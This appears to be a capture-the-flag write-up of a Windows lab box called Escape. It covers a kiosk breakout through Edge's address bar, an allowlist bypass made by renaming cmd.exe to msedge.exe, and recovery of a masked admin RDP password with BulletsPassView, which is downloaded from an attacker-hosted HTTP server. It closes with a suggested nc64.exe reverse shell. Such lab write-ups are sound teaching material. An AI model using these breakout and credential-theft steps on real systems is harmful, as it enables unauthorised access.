Summary
Escape is a Windows box that exposes only RDP (3389). The RDP session drops you into a locked-down kiosk account (KioskUser0) meant for a "Conference Display" app. The box is solved entirely through a kiosk breakout: abusing Edge's address bar to browse the local filesystem, bypassing an application allowlist by renaming binaries, then finding a third-party RDP client (Remote Desktop Plus) with saved-but-masked credentials for the admin account. Those credentials are recovered with a Nirsoft password-reveal tool, and admin turns out to be a local administrator, giving full SYSTEM-level access after a UAC prompt.
Reconnaissance
Only one port open - RDP:
nmap -A -Pn <machine-ip> -oA nmap
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
Full port scan confirmed only 3389/tcp is reachable. Windows 11-based build, standalone workgroup box (ESCAPE).
Added it to hosts and connected:
echo '<machine-ip> escape.vl ESCAPE.VL' >> /etc/hosts
xfreerdp /v:<machine-ip> /cert:ignore /sec:tls
The login screen tells you exactly what to do:
Conference Display - Login as
KioskUser0without Password
Foothold - Breaking Out of the Kiosk
Logging in as KioskUser0 drops you straight into a wallpaper ("Busan Expo") with no visible taskbar or icons. Clicking around does nothing.
- Pressing the Windows key brings up the Start menu / search bar.
- Searching
cmdand clicking it → does nothing (blocked). - Searching
edge→ opens successfully. So the restriction looks like an allowlist, not a blocklist — only specific apps (like Edge) are permitted to launch. - With Edge open, typing
C:\directly into the address bar renders a directory listing of the filesystem (Edge treats it as a localfile://browse). This is enough to walk the entire disk from the browser.
Browsing to the kiosk user's desktop:
C:\Users\KioskUser0\Desktop\user.txt
user.txt: [REDACTED]
Getting a real shell - allowlist bypass
Browsing to C:\Windows\System32\, I located cmd.exe and downloaded it via Edge into the Downloads folder. Running it directly failed:
제한 사항 (Restriction)
이 작업은 시스템 제한 때문에 취소되었습니다. 시스템 관리자에게 문의하십시오.
(This operation was cancelled due to system restrictions. Contact your administrator.)
Renaming the downloaded binary didn't help at first — but since Edge (msedge.exe) is the one thing the allowlist actually permits, renaming cmd.exe → msedge.exe and running it bypassed the restriction entirely and popped a working shell:
C:\Users\kioskUser0\Downloads>whoami
escape\kioskuser0
C:\Users\kioskUser0\Downloads>whoami /all
USER INFORMATION
----------------
User Name SID
escape\kioskuser0 S-1-5-21-3698417267-3345840482-3422164602-1002
GROUP INFORMATION (relevant)
BUILTIN\Remote Desktop Users
BUILTIN\Users
Mandatory Label\Medium Mandatory Level
PRIVILEGES INFORMATION
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
Same rename trick works for powershell.exe (download it, rename to msedge.exe, run it) to get a real PowerShell session instead of cmd.
Enumeration as kioskuser0
PS C:\Users> dir
admin
Administrator
DefaultAppPool
kioskUser0
Public
PS C:\Users> cd .\admin\
dir : Access to the path 'C:\Users\admin' is denied.
PS C:\Users> net user
admin Administrator DefaultAccount
Guest kioskUser0 WDAGUtilityAccount
Can't read admin's profile directly, but a hidden admin-owned folder is visible at the root of C:\:
PS C:\> Get-ChildItem -Force
d--h-- _admin
...
d----- temp
PS C:\_admin> ls
installers/
passwords/
temp/
Default.rdp
profiles.xml
profiles.xml is a config file for a third-party RDP client:
PS C:\_admin> type .\profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
An encrypted/encoded password for the admin profile — but we can't decrypt it manually, so the plan is to load it into the actual Remote Desktop Plus app and let the GUI decrypt it for us.
Recovering the Password
Remote Desktop Plus is installed under Program Files (x86):
PS C:\Program Files (x86)> ls
Remote Desktop Plus/
PS C:\Program Files (x86)\Remote Desktop Plus> ls
rdp.exe
Since C:\_admin isn't writable/reachable from the app's file picker, first copy profiles.xml somewhere the low-priv user can access:
copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\
Ran rdp.exe → Manage Profiles → Import → selected the copied profiles.xml. The admin profile now loads in the app, with the password field shown as bullets (••••••••). Double-clicking / editing / copying the field is all blocked — no cleartext, no clipboard.
To reveal it, used a Nirsoft tool that reads masked password fields from Windows dialogs: BulletsPassView.
# attacker box
unzip bulletspassview.zip
python3 -m http.server 80
Downloaded BulletsPassView.exe onto the target from http://<your-ip>/BulletsPassView.exe (via the browser filesystem trick again), ran it against the open Remote Desktop Plus dialog, and it revealed the masked field:
Password: Twisting30217
Privilege Escalation — kioskuser0 → admin
Confirmed admin is a local administrator:
PS C:\temp> net user admin
Local Group Memberships *Administrators
Password required No
First attempt with runas didn't actually elevate (still showed kioskuser0 after — likely a profile/token quirk with runas in this restricted context):
runas /user:admin powershell
Instead, spawning PowerShell with an elevation request worked and triggered a normal UAC consent prompt:
Start-Process powershell.exe -Verb runas
The prompt asked to allow Windows PowerShell (Microsoft-signed) to make changes — clicked Yes, and landed in an elevated shell:
PS C:\Windows\system32> whoami
escape\admin
Root Flag
PS C:\Users\Administrator\Desktop> ls
Microsoft Edge.lnk
root.txt
PS C:\Users\Administrator\Desktop> type .\root.txt
[REDACTED]
At this point you're escape\admin, a full local administrator with no shell restrictions — from here you can also drop nc64.exe, catch a reverse shell, and operate as SYSTEM without any of the kiosk-mode limitations.
Key Vulnerabilities & Attack Chain
-
Kiosk breakout via browser LOLBin — Edge's address bar accepts local paths (
C:\) and renders a full directory listing, giving filesystem access from a "locked down" kiosk session. -
Weak application allowlist — restriction is enforced by filename/allowlist rather than a real AppLocker/SRP hash policy, so simply renaming
cmd.exe/powershell.exetomsedge.exebypasses it entirely. -
Cleartext-recoverable stored credentials —
Remote Desktop Plusstores admin RDP credentials in a world-readable-once-copiedprofiles.xml; the app's own password masking is trivially defeated with a generic password-reveal tool (BulletsPassView), since it's just a masked UI field, not real encryption-at-rest protection. -
Weak/no password policy — admin account had "password required: No" enabled at some point and a simple password (
Twisting30217). -
Standard UAC consent — once valid admin credentials/session are available,
Start-Process -Verb runas+ accepting the UAC prompt is enough to get a fully elevated administrator shell.
Attack Chain
RDP → KioskUser0 (no password)
│
├── Kiosk breakout
│ ├── Win key → Start search
│ │ ├── "cmd" → blocked (allowlist)
│ │ └── "edge" → allowed
│ └── Edge address bar → C:\ (file:// directory listing)
│ └── user.txt [FLAG 1]
│
├── Shell access
│ ├── Download cmd.exe / powershell.exe from System32
│ ├── Rename → msedge.exe
│ └── Run → allowlist bypassed → shell as escape\kioskuser0
│
├── Credential discovery
│ ├── C:\_admin\profiles.xml (Remote Desktop Plus config)
│ ├── copy → C:\Users\kioskUser0\Downloads\
│ ├── Import into rdp.exe (Remote Desktop Plus GUI)
│ │ └── password shown as ●●●●●●●● (masked)
│ └── BulletsPassView.exe (hosted on attacker box, downloaded to target)
│ └── reveals password → Twisting30217
│
└── Privilege escalation
├── net user admin → member of Administrators
├── runas /user:admin powershell → didn't elevate
└── Start-Process powershell -Verb runas
└── UAC prompt → Yes → escape\admin
└── root.txt [FLAG 2]
Top comments (0)